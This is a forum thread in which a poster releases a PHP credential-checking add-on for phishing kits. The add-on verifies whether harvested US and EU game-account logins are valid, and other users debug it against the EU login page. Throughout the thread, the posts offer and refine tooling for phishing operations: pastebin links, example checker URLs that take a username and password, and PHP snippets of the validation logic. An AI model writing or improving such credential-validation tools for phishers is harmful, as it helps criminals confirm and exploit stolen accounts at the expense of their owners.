[RELEASE] Account Check Functionality for PHP Phishers

[Apoc]

After seeing so many phishers NOT having proper functionality, and having loads upon loads of fake accounts/passwords thrown into their logs, I decided to port over some of the functionality of Scam Tools Suite to PHP so you guys can use it in your phishers.

You can find the latest version here.

A newer version in the form of a class (much better PHP style) and with a bit more functionality: http://pastebin.com/f19f72b2a
Example usage here: http://pastebin.com/f3c2bd903

The new version has support for logging valid accounts, using proxies, and doing some extra parsing. See the commented defines at the top of the file for more details.

To check for EU accounts use the CheckEuLogin function.
For US accounts, use the CheckUsLogin function.

It will fail on invalid logins, or invalid account/password combos. But return a success, when it is actually successful!

Please note: you NEED cURL installed on your web server. The PHP script does a check to start with to make sure you have the required functions available. If in doubt, just try and check an account, and see if the "FAIL: cURL not available!" message comes up.

It supports both EU and US log ins. And is confirmed as working!

Enjoy folks!

P.S: If you use it, please give credit! From what I've learned, this is the only one available with this functionality. I'm not a fan of people taking my work and slapping their names on it.

[Remus]

AW MAW GAWD!!!!!!!!!! ahhhhh. nice >.>

[wowmania]

Yea great release but can you do US and Eu mixed ?

[Apoc]

Of course. Once I'm able to get into the EU account management site. I will.

However, I prefer to keep EU/US separate. (Will be contained in the same file of course)

This makes it easier for phishers to check based on whichever type they're targeting.

[wowmania]

Yea this is true what the prob with the EU page ? How i can help you ?

[DrElitist]

cool, must test this out

[Freezing Process]

A simple edit of the URL and it's all working. Tested and success. Fully working with the EU servers.

Code:

http : // pastebin.com/f323b2a6c

[wowmania]

Thk you for the EU +Rep

[Apoc]

A simple edit of the URL and it's all working. Tested and success. Fully working with the EU servers.

Code:

http : // pastebin.com/f323b2a6c

Not working.

Tested via proxy, and with actual output.

Not to mention, the EU site requires an LT signature passed as a POST param.

[Freezing Process]

Not working.

Tested via proxy, and with actual output.

Not to mention, the EU site requires an LT signature passed as a POST param.

You sure? 'Cause it works with several of my accounts. o_O;

[Apoc]

You sure? 'Cause it works with several of my accounts. o_O;

Yup, positive.

PHP pastebin - collaborative debugging tool

Try that, the same way you tried the US one.

Ex:

Code:

http : // yoursite/AccountCheckEngine.php?username=yourusername&password=yourpassword

It'll just output what is returned from the cURL request. You'll see it's not quite what you're looking for.

[oO_Hultin_Oo]

WOW. This. is. pure ****ing epic! Really good work Apoc

[Freezing Process]

Yup, positive.

PHP pastebin - collaborative debugging tool

Try that, the same way you tried the US one.

Ex:

Code:

http : // yoursite/AccountCheckEngine.php?username=yourusername&password=yourpassword

It'll just output what is returned from the cURL request. You'll see it's not quite what you're looking for.

You're doing it wrong.

This part;

Code:

$tmp = CheckEuLogin($_REQUEST['username'], $_REQUEST['password']);

echo $tmp;

In the code you're posting, you're running CheckEuLogin before the function is set.

Check out how I added the checking part;

http : // sophonax.com/phis.phps

Run the code here;

http : // sophonax.com/phis.php?username=yourusername&password=yourpassword

Works fine with me.

[Pina]

You're doing it wrong.

This part;

Code:

$tmp = CheckEuLogin($_REQUEST['username'], $_REQUEST['password']);

echo $tmp;

In the code you're posting, you're running CheckEuLogin before the function is set.

Check out how I added the checking part;

http : // sophonax.com/phis.phps

Run the code here;

http : // sophonax.com/phis.php?username=yourusername&password=yourpassword

Works fine with me.

It says ACCEPTED to me.

[Apoc]

You're doing it wrong.

This part;

Code:

$tmp = CheckEuLogin($_REQUEST['username'], $_REQUEST['password']);

echo $tmp;

In the code you're posting, you're running CheckEuLogin before the function is set.

Check out how I added the checking part;

http : // sophonax.com/phis.phps

Run the code here;

http : // sophonax.com/phis.php?username=yourusername&password=yourpassword

Works fine with me.

The great part about PHP, the function doesn't need to be defined first if it's in the same file.

I.E: Do the same, but add an echo "In a function<br />"; in the CheckUsername, CheckPassword, and CheckAccount functions. You'll see there's no problem calling them.

Also, you still didn't do what I told you to.

Change

Code:

    if (strstr($returnedPage, "Invalid account name or password"))
    {
        return "FAIL: Invalid account name or password";
    }
    else
    {
        return "SUCCESS";
    }

To

Code:

    if (strstr($returnedPage, "Invalid account name or password"))
    {
        return "FAIL: Invalid account name or password";
    }
    else
    {
        return $returnedPage;
    }

You'll see your output is NOT what you think it is. (Keep in mind, it's only checking if the page contains "Invalid account name or password".)